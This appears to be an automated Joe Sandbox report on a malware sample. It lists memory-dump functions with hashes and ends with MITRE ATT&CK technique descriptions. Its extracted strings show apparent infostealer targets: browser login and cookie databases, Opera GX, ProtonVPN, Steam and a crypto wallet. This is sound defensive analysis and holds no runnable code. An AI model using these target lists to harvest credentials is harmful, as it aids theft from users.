Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731c2983917e49a3aee3af9b23c842cae59839b70e3ba6bf74a4f01b4cc0265d
Instruction ID: 0e60b3d551f634fa54be28b5c61166fddf4262246f5e55f6aaf51daf479f7cdf
Opcode Fuzzy Hash: 731c2983917e49a3aee3af9b23c842cae59839b70e3ba6bf74a4f01b4cc0265d
Instruction Fuzzy Hash: 08D19F70B002159FDB418F68C855AAE7BB6FF89704F14845AE641DF3A2CBB19C45CB92

Function 06821535 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a792f8970e5baecded88ed6a24fcd1b34e6c0947592661abe36d1aca5fee35
Instruction ID: 3ccad2b838151c241abf911021386b22518ebe06076a16bdf0299a58aa89aef9
Opcode Fuzzy Hash: c3a792f8970e5baecded88ed6a24fcd1b34e6c0947592661abe36d1aca5fee35
Instruction Fuzzy Hash: 2AC14734B10104AFCB449F98C899E9DB7B2FF89300F618199FA41DB761CA72EC55CB55

Function 071FCAF8 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae4aa13632a3a59dde2da3ae06e76ddf99af3dd73e67b06e269e4f946675726
Instruction ID: f2cdf99ceec68041433e5fb9d9d8a5b6538ea26308a595ab8f0c4fc5436518ad
Opcode Fuzzy Hash: 8ae4aa13632a3a59dde2da3ae06e76ddf99af3dd73e67b06e269e4f946675726
Instruction Fuzzy Hash: 57B15BB47006058FCB15DF79C494A6ABBF2BF89700B1540A9E546DB3A1CB30ED45DBA0

Function 06821308 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad21d526d875b90ddf33fd574bdcbd41a7b82fd22368b9a38cf4c7c02e71abf
Instruction ID: f675a0f70556a3729f8897196dedf759b667ec474c70fc9ac4b08f3879b21a48
Opcode Fuzzy Hash: 1ad21d526d875b90ddf33fd574bdcbd41a7b82fd22368b9a38cf4c7c02e71abf
Instruction Fuzzy Hash: 43511931B003668FC7649E69988856EBBEAAFC1214B34853ADB85C7251EB30D8C1C791

Function 071FC187 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9408a436879f8eb06e2f1f5c0ed4869f9593dd97036d2102bc82a5320a59cf2
Instruction ID: 2065391632741bfd5abad40c7c624618f54e6c163ff4c2aa69d9761c66f5868d
Opcode Fuzzy Hash: e9408a436879f8eb06e2f1f5c0ed4869f9593dd97036d2102bc82a5320a59cf2
Instruction Fuzzy Hash: 476175B0B006198FCB15DFA9C8906AEBBF6BF88600F158169D905EB395DB30DC41DBE0

Function 071FEAB3 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889d6310e99f1d5954560d6746de2a1f9b8c6132706098e45f1770aede865a11
Instruction ID: 4953e9e360c0da1d8cdc237af21cc9e70ace65fccfe68d1ecc44e714c113f802
Opcode Fuzzy Hash: 889d6310e99f1d5954560d6746de2a1f9b8c6132706098e45f1770aede865a11
Instruction Fuzzy Hash: 147194B0A0021A9FDB15DFA8D894A9EBBF2FF44300F058569E555BB3A1DB30ED45CB90

Function 071FE250 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e02ef5e2953a5eb14cd24d841fb3822f895e3ff31cb889a4ddfcd6a3038403
Instruction ID: ca71db11cc15b5047c6abbeff9a548603596cfd9956ba234d5d8f67a811c0a9f
Opcode Fuzzy Hash: 58e02ef5e2953a5eb14cd24d841fb3822f895e3ff31cb889a4ddfcd6a3038403
Instruction Fuzzy Hash: 285190B1B002058FCB14DF69D88499EBBF5FF88210B1585AAE605DB362DB30EC45CBA1

Function 071FD7C9 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd6feaef20b8ab89cd63a2bd153eea7ddd8b6cbcf44fb38057c218e41100405
Instruction ID: 90683b3b7ee0fe1b30f311a6e322a4e4873bd48edf3febd859c70add9cc14439
Opcode Fuzzy Hash: 7bd6feaef20b8ab89cd63a2bd153eea7ddd8b6cbcf44fb38057c218e41100405
Instruction Fuzzy Hash: 6E51ADB17002059FCB16DF78E8649AABBB2FF85304B508568E946CB7D1DB31EC42CB91

Function 071FDC19 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a24d15edc41cba16cb0aa82fbff885579414fd9d03849220ffc6bf3e1c69da1
Instruction ID: 7176e74ffe483eadd50eb7e4452bae4631f29a056fe846e9fd462969055d3d09
Opcode Fuzzy Hash: 2a24d15edc41cba16cb0aa82fbff885579414fd9d03849220ffc6bf3e1c69da1
Instruction Fuzzy Hash: 5A418AB5700606DFCB15CF59C49096ABBF2FF89310B15C999E6999B3A2D730F801CB90

Function 071FE561 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a712ab1658cba756d7138d3c787af8bfc2c93ffd9c0522bd4398c0d4d922b2
Instruction ID: 21406fcb276e19b2ee45c6f64fcb022d43768da5c4b2d9406224ead4057b4d08
Opcode Fuzzy Hash: 26a712ab1658cba756d7138d3c787af8bfc2c93ffd9c0522bd4398c0d4d922b2
Instruction Fuzzy Hash: A431D3B57086958FCB06CF78D86496A7FB5AF8621070941EAE546CB2F3DB30CC05C7A2

Function 071FD7D8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd949e2c177599a8f1d91debc8a824c7413fb3482febc1fe8a8c0f4488b2fd00
Instruction ID: 659cb2eebfe2f6860fed959e74779d4d85fb536cf37315fcb1769500111dce3d
Opcode Fuzzy Hash: fd949e2c177599a8f1d91debc8a824c7413fb3482febc1fe8a8c0f4488b2fd00
Instruction Fuzzy Hash: C33178B5B002159FCB15DF78E89496E7BB6FF89300B508068E906CB391DB31ED41CBA1

Function 0682338B Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6f817c74be45aa8812568a55012dd00e678b29ad47975c896a79030f920800
Instruction ID: 7034fd7e7e7dc0b0f58dae055b26e1d1b98617668637ba9240fa987e3e409338
Opcode Fuzzy Hash: ba6f817c74be45aa8812568a55012dd00e678b29ad47975c896a79030f920800
Instruction Fuzzy Hash: AF215935B001149FCB54CF68D994EADBBB2FF88714F1180A9FA059B361DA31ED40CB50

Function 010AD054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331eb96a088bed29c93056ede77570bddd2ee4e305f78198c1b0c474ced3bdb1
Instruction ID: f1a8fa1bbf23df0a43a4fc5d1a0d590f8384910c41e5ce47f8126520ad8ed14e
Opcode Fuzzy Hash: 331eb96a088bed29c93056ede77570bddd2ee4e305f78198c1b0c474ced3bdb1
Instruction Fuzzy Hash: E5214B71504200EFCF15DF94D8C0F2ABFA5FB88314F64C6A9EA490B656C336D416CB61

Function 010BD4A4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d79e23708cda06e04ce83d049256756a65a5be309486f78b923d56f985a052
Instruction ID: d764b620e8f3ebf5c997c195cc01c03d1cc31752a04ad26e37d0cc08d4ce84d5
Opcode Fuzzy Hash: 86d79e23708cda06e04ce83d049256756a65a5be309486f78b923d56f985a052
Instruction Fuzzy Hash: 042104B1504204EFDB05CF58D5C0B6AFBA5FB8431CF24C9ADE98A4B252C73AD846CB61

Function 010BD2F4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ea61c3e3f2c3b7073d84d574dbac131c0465c6b420b910e8a16f0356f13abe
Instruction ID: 791574aa816182dab53a7f88ee2bd10ca83b83c4f8e7feae06b17d7723d43ce7
Opcode Fuzzy Hash: 80ea61c3e3f2c3b7073d84d574dbac131c0465c6b420b910e8a16f0356f13abe
Instruction Fuzzy Hash: 6F2129B5605200DFDB05DF58D5C0B6AFBA5FB84718F24C569D8894B247C33AD406CBA1

Function 071FE570 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e665eb321987460602487e7ebe42fa3e718f0fdaf3d56ca57d8d9e5b986607fd
Instruction ID: eb1019883d61371711ee34b244b0c6800eb68c1484237273460c1d026e6ba0e3
Opcode Fuzzy Hash: e665eb321987460602487e7ebe42fa3e718f0fdaf3d56ca57d8d9e5b986607fd
Instruction Fuzzy Hash: A7216D75B0011ACFCB15DF68D59486EB7F6EF882107148079EA06DB3A0DB31DC02CB91

Function 071FE3F8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0cf2376248f45887013bd1fed1249b49676a212c9b852acb2345d75886e5be
Instruction ID: b17d754476b88dd7b45ae89e62123ce248dff1144a8ec69270ac493b65060a0d
Opcode Fuzzy Hash: de0cf2376248f45887013bd1fed1249b49676a212c9b852acb2345d75886e5be
Instruction Fuzzy Hash: 9C1142B6B00215CFDB25AFB5D8586EEBBB5EB88220F040029D506E3394DF755C45CB91

Function 071FE630 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a08ecef493c7b4b9bbe109ea3f6fa503c7a8ce734f1f191171b5c8b16ba080d
Instruction ID: 084795512d7b6dacc38ceae8eafe5d8695531b5403d0b0a39c9b6686f9dda485
Opcode Fuzzy Hash: 7a08ecef493c7b4b9bbe109ea3f6fa503c7a8ce734f1f191171b5c8b16ba080d
Instruction Fuzzy Hash: 561136B27053409FD711CB6CD844F92BBE0DF81320F0585AAE254CF6B2D7A1E846DB01

Function 010AD04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
Instruction ID: 15be4f7c41743e943ed08929b2f5e9f4c0d8fadf971d72b4eccdfd695f7a749f
Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
Instruction Fuzzy Hash: BF21DF76404280DFCF16CF84D9C0B16BFB2FB88314F2486A9E9490B657C33AE466CB91

Function 010BD49F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: d1d7789fc160b46221997e81e0c1ee33e16ac0d5ab2574f8f759c147a135a023
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: A911D075504244CFDB02CF58D5C4B15FFA1FB84318F24C6AAD9894B656C33AD44ACB51

Function 010BD2EF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857814383.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10bd000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction ID: 1437560522de67c11a5c0b72fdde6ec3883334eee4ec0b59c9c5a11f5ac5a38e
Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction Fuzzy Hash: BC11E275505280CFDB12CF14D5C0B59FFA1FB84728F24C6AAD8894B647C33AD40ACBA1

Function 010ADAD1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8110f0c2ded7917ef7d983dcf351d5d33c7cbe1d6058db041bd5cf83eee546fa
Instruction ID: 31390e27a13a3ef1a4eaf7061c321695bbdec2b5433d5acb3fbf939d1e4fbc36
Opcode Fuzzy Hash: 8110f0c2ded7917ef7d983dcf351d5d33c7cbe1d6058db041bd5cf83eee546fa
Instruction Fuzzy Hash: 52012B72508300DAE7108BD9CDC0B67FFD8DF40360F58C45AED894A693C6789840C771

Function 071FD758 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a59595c37afe749094b87637ceb58ae6ea38ecaee8c019f33d11af9187bca6c
Instruction ID: 80191b06994ccfe95acc49c85d507ce62883145d49d40495ab3d081e1462244e
Opcode Fuzzy Hash: 9a59595c37afe749094b87637ceb58ae6ea38ecaee8c019f33d11af9187bca6c
Instruction Fuzzy Hash: BE01D1F0700302CFCB2ADA75A414533B7F6BF81209B148E2DD6828AA94DB71E480CB80

Function 071FD748 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76756af52a59c375d9204d4215fd81c1eec70891421b61a70aacce18534a1e68
Instruction ID: 5c57265f100b929bd495976f62e7bb1e5627ab62bbc0607ee71b245f523c6a6e
Opcode Fuzzy Hash: 76756af52a59c375d9204d4215fd81c1eec70891421b61a70aacce18534a1e68
Instruction Fuzzy Hash: C0F0F6F17143028FC7268A21E811A7277B5AF81609B458A6DD5C28F5D1D775E482CFD2

Function 071FE620 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1335543407398bb0cf426aa11133b80a79ddb443e10473f965b3f50400ef41
Instruction ID: 16f2f560c31a57a597ba8772f17ebe88171cbdfdb5882a2f09eb0612c49bcb20
Opcode Fuzzy Hash: aa1335543407398bb0cf426aa11133b80a79ddb443e10473f965b3f50400ef41
Instruction Fuzzy Hash: C4F0F6712003055FCB228A34DD44F917FA5AB86735F054566E2288F1F2D7B1D849A780

Function 010ADAD0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1857758004.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10ad000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a914a7018411910b5a9404a0f65286ee87a2ea36aff920ff3b3d28c9de2d85e2
Instruction ID: f5530f65cf45328ba594617e817f1784e95cf14688fcb59782b0bd5f4cc5174d
Opcode Fuzzy Hash: a914a7018411910b5a9404a0f65286ee87a2ea36aff920ff3b3d28c9de2d85e2
Instruction Fuzzy Hash: 8BF0CD72404344AEE7208A4AC9C4B62FFD8EB80724F18C09AED484E683C278A840CBB0

Non-executed Functions

Function 071F0768 Relevance: 5.4, Strings: 4, Instructions: 397COMMON

Download Yara Rule

Strings

Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt, xrefs: 071F0A08
Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI, xrefs: 071F0862
%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN, xrefs: 071F0A42
Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S, xrefs: 071F08A5

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: %USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentmingAppData\Local\ProtonVPN$Login DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionI$Opera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSt$Web DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\S
API String ID: 0-1501812523
Opcode ID: a597acf52c8dc91b053d2db866e2b8783875bc72c6c62fb3d276465bf5510419
Instruction ID: cb6ffdc212ff8d3052625a7090b31a5a3b6033dbcd4ac2a58d09e39a12d679f6
Opcode Fuzzy Hash: a597acf52c8dc91b053d2db866e2b8783875bc72c6c62fb3d276465bf5510419
Instruction Fuzzy Hash: B8E1B070A0071A8BDB14EF74C8507AEB7B2BF88300F50C569D949AB395EF749D85CB90

Function 06820D50 Relevance: 10.3, Strings: 8, Instructions: 296COMMON

Download Yara Rule

Strings

$fq, xrefs: 06820E42
$fq, xrefs: 06820DCC
$fq, xrefs: 06820F00
$fq, xrefs: 06820E4E
$fq, xrefs: 06820F82
$fq, xrefs: 06820F76
$fq, xrefs: 06820F50
$fq, xrefs: 06820E1C

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: a4b3e2ff1287b118d0b09ed6d917789f3f1f655052a05d626960a1ced0edc03c
Instruction ID: 548ed5d42c540d6a16aabec85f254091202217c946cb42b51f6f5f33c52475be
Opcode Fuzzy Hash: a4b3e2ff1287b118d0b09ed6d917789f3f1f655052a05d626960a1ced0edc03c
Instruction Fuzzy Hash: D1B1E334B0025A8FDB54DB69C854ABEBBF6BF88304F14805AE546DB7A1DB70DC81CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

